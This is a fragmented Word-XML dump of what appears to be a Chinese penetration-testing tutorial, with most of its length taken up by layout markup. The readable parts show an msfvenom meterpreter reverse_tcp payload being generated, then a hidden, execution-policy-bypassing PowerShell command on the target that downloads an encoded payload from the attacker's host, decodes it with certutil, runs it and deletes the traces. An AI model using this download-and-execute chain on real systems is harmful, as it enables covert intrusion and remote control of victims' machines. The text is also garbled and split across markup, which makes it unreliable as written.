1510,3090,1510,3084,1510,3078,1510,3072,1510,3065,1510,3059,1510,3052,1510,3044,1510,3037,1510,3029,1510,3021,1510,3013,1510,3005,1510,2996,1510,2987,1510,2978,1510,2969,1510,2959,1510,2949,1510,2939,1510,2929,1510,2918,1510,2907,1510,2896,1510,2885,1510,2873,1510,2861,1510,2849,1510,2836,1510,2823,1510,2810,1510,2797,1510,2783,1510,2769,1510,2754,1510,2740,1510,2725,1510,2709,1510,2694,1510,2678,1510,2661,1510,2645,1510,2628,1510,2610,1510,2593,1510,2574,1510,2556,1510,2537,1510,2518,1510,2499,1510,2479,1510,2459,1510,2438,1510,2417,1510,2396,1510,2374,1510,2352,1510,2330,1510,2307,1510,2284,1510,2260e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:111.600pt;width:445.800pt;height:48.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId9" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:180.600pt;width:467.400pt;height:80.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId10" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:280.800pt;width:467.400pt;height:283.20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生成payload：（有关生成payloa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d，会在未来的系列中讲到）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root@John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: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tmp#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msfvenom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windows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x64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meterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="1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reverse_tcp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LHOST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.5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LPORT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cmd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powershell_base64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psh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Micropoor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1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>xt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6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启动apach</w:t>
      </w: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e：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195.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId12" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:326.399pt;width:467.400pt;height:192.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId13" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:579.600pt;width:467.400pt;height:181.80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3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w w:val="101"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>powersh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:w w:val="101"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ell框架设置：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w w:val="98"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:w w:val="98"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:w w:val="98"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:w w:val="98"/>
          <w:spacing w:val="-25"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:w w:val="98"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://192.168.1.5/Micropoor.txt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3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w w:val="153"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:w w:val="153"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ORY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90.599pt;width:467.400pt;height:194.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId15" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:345.600pt;width:467.400pt;height:71.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId16" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:477.600pt;width:467.400pt;height:163.8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8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="17"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RTUTIL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4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5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ALL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2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9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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混淆内容保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存txt，后进行encode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328.200pt;width:7.200pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId18" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:202.500pt;width:449.500pt;height:75.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,4050" coordsize="8990,1510">
        <v:shape style="position:absolute;left:1490;top:4050;width:8990;height:1510" coordorigin="1490,4050" coordsize="8990,1510" path="m1510,4076l1510,4076,1510,4076,1510,4076,1510,4076,1510,4076,1510,4076,1511,4076,1512,4076,1512,4076,1514,4076,1515,4076,1517,4076,1519,4076,1521,4076,1524,4076,1528,4076,1532,4076,1536,4076,1541,4076,1546,4076,1552,4076,1559,4076,1566,4076,1575,4076,1583,4076,1593,4076,1603,4076,1615,4076,1627,4076,1640,4076,1654,4076,1668,4076,1684,4076,1701,4076,1719,4076,1738,4076,1758,4076,1780,4076,1802,4076,1826,4076,1851,4076,1877,4076,1904,4076,1933,4076,1963,4076,1995,4076,2028,4076,2063,4076,2099,4076,2136,4076,2175,4076,2216,4076,2259,4076,2303,4076,2348,4076,2396,4076,2445,4076,2496,4076,2549,4076,2604,4076,2660,4076,2719,4076,2779,4076,2841,4076,2906,4076,2972,4076,3041,4076,3112,4076,3184,4076,3259,4076,3336,4076,3416,4076,3498,4076,3582,4076,3668,4076,3757,4076,3848,4076,3941,4076,4037,4076,4136,4076,4236,4076,4340,4076,4446,4076,4555,4076,4666,4076,4780,4076,4897,4076,5017,4076,5139,4076,5264,4076,5392,4076,5523,4076,5657,4076,5793,4076,5933,4076,6076,4076,6222,4076,6370,4076,6522,4076,6677,4076,6835,4076,6997,4076,7161,4076,7329,4076,7500,4076,7675,4076,7853,4076,8034,4076,8219,4076,8407,4076,8598,4076,8793,4076,8992,4076,9194,4076,9400,4076,9609,4076,9823,4076,10039,4076,10260,4076,10484,4076,10484,4076,10484,4076,10484,4076,10484,4076,10484,4076,10484,4076,10484,4076,10484,4076,10484,4077,10484,4077,10484,4077,10484,4077,10484,4078,10484,4078,10484,4078,10484,4079,10484,4080,10484,4080,10484,4081,10484,4082,10484,4083,10484,4084,10484,4085,10484,4087,10484,4088,10484,4090,10484,4092,10484,4093,10484,4095,10484,4098,10484,4100,10484,4102,10484,4105,10484,4108,10484,4111,10484,4114,10484,4117,10484,4121,10484,4124,10484,4128,10484,4132,10484,4137,10484,4141,10484,4146,10484,4151,10484,4156,10484,4162,10484,4168,10484,4174,10484,4180,10484,4186,10484,4193,10484,4200,10484,4207,10484,4215,10484,4223,10484,4231,10484,4239,10484,4248,10484,4257,10484,4266,10484,4276,10484,4286,10484,4297,10484,4307,10484,4318,10484,4330,10484,4341,10484,4353,10484,4366,10484,4378,10484,4392,10484,4405,10484,4419,10484,4433,10484,4448,10484,4463,10484,4479,10484,4494,10484,4511,10484,4527,10484,4545,10484,4562,10484,4580,10484,4599,10484,4618,10484,4637,10484,4657,10484,4677,10484,4698,10484,4719,10484,4740,10484,4763,10484,4785,10484,4808,10484,4832,10484,4856,10484,4881,10484,4906,10484,4932,10484,4958,10484,4984,10484,5012,10484,5039,10484,5068,10484,5097,10484,5126,10484,5156,10484,5187,10484,5218,10484,5250,10484,5282,10484,5315,10484,5348,10484,5382,10484,5417,10484,5452,10484,5488,10484,5525,10484,5562,10484,5562,10484,5562,10484,5562,10484,5562,10484,5562,10484,5562,10483,5562,10482,5562,10482,5562,10480,5562,10479,5562,10477,5562,10475,5562,10473,5562,10470,5562,10466,5562,10462,5562,10458,5562,10453,5562,10448,5562,10442,5562,10435,5562,10428,5562,10419,5562,10411,5562,10401,5562,10391,5562,10379,5562,10367,5562,10354,5562,10340,5562,10326,5562,10310,5562,10293,5562,10275,5562,10256,5562,10236,5562,10215,5562,10192,5562,10168,5562,10143,5562,10117,5562,10090,5562,10061,5562,10031,5562,9999,5562,9966,5562,9931,5562,9895,5562,9858,5562,9819,5562,9778,5562,9735,5562,9691,5562,9646,5562,9598,5562,9549,5562,9498,5562,9445,5562,9391,5562,9334,5562,9275,5562,9215,5562,9153,5562,9088,5562,9022,5562,8953,5562,8883,5562,8810,5562,8735,5562,8658,5562,8578,5562,8497,5562,8413,5562,8326,5562,8238,5562,8146,5562,8053,5562,7957,5562,7859,5562,7758,5562,7654,5562,7548,5562,7439,5562,7328,5562,7214,5562,7097,5562,6977,5562,6855,5562,6730,5562,6602,5562,6471,5562,6337,5562,6201,5562,6061,5562,5918,5562,5773,5562,5624,5562,5472,5562,5317,5562,5159,5562,4997,5562,4833,5562,4665,5562,4494,5562,4319,5562,4141,5562,3960,5562,3776,5562,3587,5562,3396,5562,3201,5562,3002,5562,2800,5562,2594,5562,2385,5562,2172,5562,1955,5562,1734,5562,1510,5562,1510,5562,1510,5562,1510,5562,1510,5562,1510,5562,1510,5562,1510,5562,1510,5561,1510,5561,1510,5561,1510,5561,1510,5561,1510,5560,1510,5560,1510,5559,1510,5559,1510,5558,1510,5557,1510,5557,1510,5556,1510,5555,1510,5554,1510,5552,1510,5551,1510,5550,1510,5548,1510,5546,1510,5544,1510,5542,1510,5540,1510,5538,1510,5536,1510,5533,1510,5530,1510,5527,1510,5524,1510,5521,1510,5517,1510,5513,1510,5509,1510,5505,1510,5501,1510,5496,1510,5492,1510,5487,1510,5481,1510,5476,1510,5470,1510,5464,1510,5458,1510,5452,1510,5445,1510,5438,1510,5431,1510,5423,1510,5415,1510,5407,1510,5399,1510,5390,1510,5381,1510,5371,1510,5362,1510,5352,1510,5341,1510,5331,1510,5320,1510,5308,1510,5297,1510,5285,1510,5272,1510,5259,1510,5246,1510,5233,1510,5219,1510,5205,1510,5190,1510,5175,1510,5159,1510,5143,1510,5127,1510,5110,1510,5093,1510,5076,1510,5058,1510,5039,1510,5020,1510,5001,1510,4981,1510,4961,1510,4940,1510,4919,1510,4897,1510,4875,1510,4853,1510,4829,1510,4806,1510,4782,1510,4757,1510,4732,1510,4706,1510,4680,1510,4653,1510,4626,1510,4598,1510,4570,1510,4541,1510,4512,1510,4482,1510,4451,1510,4420,1510,4388,1510,4356,1510,4323,1510,4290,1510,4256,1510,4221,1510,4186,1510,4150,1510,4113,1510,4076e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:203.500pt;width:449.500pt;height:0.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,4070" coordsize="8990,10">
        <v:shape style="position:absolute;left:1490;top:4070;width:8990;height:10" coordorigin="1490,4070" coordsize="8990,10" path="m1510,4084l1510,4084,1510,4084,1510,4084,1510,4084,1510,4084,1510,4084,1511,4084,1512,4084,1512,4084,1514,4084,1515,4084,1517,4084,1519,4084,1521,4084,1524,4084,1528,4084,1532,4084,1536,4084,1541,4084,1546,4084,1552,4084,1559,4084,1566,4084,1575,4084,1583,4084,1593,4084,1603,4084,1615,4084,1627,4084,1640,4084,1654,4084,1668,4084,1684,4084,1701,4084,1719,4084,1738,4084,1758,4084,1780,4084,1802,4084,1826,4084,1851,4084,1877,4084,1904,4084,1933,4084,1963,4084,1995,4084,2028,4084,2063,4084,2099,4084,2136,4084,2175,4084,2216,4084,2259,4084,2303,4084,2348,4084,2396,4084,2445,4084,2496,4084,2549,4084,2604,4084,2660,4084,2719,4084,2779,4084,2841,4084,2906,4084,2972,4084,3041,4084,3112,4084,3184,4084,3259,4084,3336,4084,3416,4084,3498,4084,3582,4084,3668,4084,3757,4084,3848,4084,3941,4084,4037,4084,4136,4084,4236,4084,4340,4084,4446,4084,4555,4084,4666,4084,4780,4084,4897,4084,5017,4084,5139,4084,5264,4084,5392,4084,5523,4084,5657,4084,5793,4084,5933,4084,6076,4084,6222,4084,6370,4084,6522,4084,6677,4084,6835,4084,6997,4084,7161,4084,7329,4084,7500,4084,7675,4084,7853,4084,8034,4084,8219,4084,8407,4084,8598,4084,8793,4084,8992,4084,9194,4084,9400,4084,9609,4084,9823,4084,10039,4084,10260,4084,10484,4084e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:276.500pt;width:449.500pt;height:1.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,5530" coordsize="8990,30">
        <v:shape style="position:absolute;left:1490;top:5530;width:8990;height:30" coordorigin="1490,5530" coordsize="8990,30" path="m1510,5554l1510,5554,1510,5554,1510,5554,1510,5554,1510,5554,1510,5554,1511,5554,1512,5554,1512,5554,1514,5554,1515,5554,1517,5554,1519,5554,1521,5554,1524,5554,1528,5554,1532,5554,1536,5554,1541,5554,1546,5554,1552,5554,1559,5554,1566,5554,1575,5554,1583,5554,1593,5554,1603,5554,1615,5554,1627,5554,1640,5554,1654,5554,1668,5554,1684,5554,1701,5554,1719,5554,1738,5554,1758,5554,1780,5554,1802,5554,1826,5554,1851,5554,1877,5554,1904,5554,1933,5554,1963,5554,1995,5554,2028,5554,2063,5554,2099,5554,2136,5554,2175,5554,2216,5554,2259,5554,2303,5554,2348,5554,2396,5554,2445,5554,2496,5554,2549,5554,2604,5554,2660,5554,2719,5554,2779,5554,2841,5554,2906,5554,2972,5554,3041,5554,3112,5554,3184,5554,3259,5554,3336,5554,3416,5554,3498,5554,3582,5554,3668,5554,3757,5554,3848,5554,3941,5554,4037,5554,4136,5554,4236,5554,4340,5554,4446,5554,4555,5554,4666,5554,4780,5554,4897,5554,5017,5554,5139,5554,5264,5554,5392,5554,5523,5554,5657,5554,5793,5554,5933,5554,6076,5554,6222,5554,6370,5554,6522,5554,6677,5554,6835,5554,6997,5554,7161,5554,7329,5554,7500,5554,7675,5554,7853,5554,8034,5554,8219,5554,8407,5554,8598,5554,8793,5554,8992,5554,9194,5554,9400,5554,9609,5554,9823,5554,10039,5554,10260,5554,10484,5554e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:202.800pt;width:445.800pt;height:75.599pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId19" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:442.800pt;height:93.599pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index: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6026" w:firstLine="0"/>
      </w:pP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把cer.cer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与Micropoo.txt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放置同一目录下。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目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>标机执行：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="5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powershell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Win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hiddeN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Exec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ByPasS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add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content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path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%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APPDATA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\ce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dc4867"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cer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Object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Net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WebClient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dc4867"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DownloadString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'http://192.168.1.5/cer.c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er'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certutil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decode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APPDATA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\cer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cer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%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APPDATA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\stage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ps1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&amp;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start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md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powershell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exe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Exec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Bypass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NoExit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File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%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APPDATA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\stage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ps1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&amp;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rt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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>b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cmd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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>c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del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%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>APPDATA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\cer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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cer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9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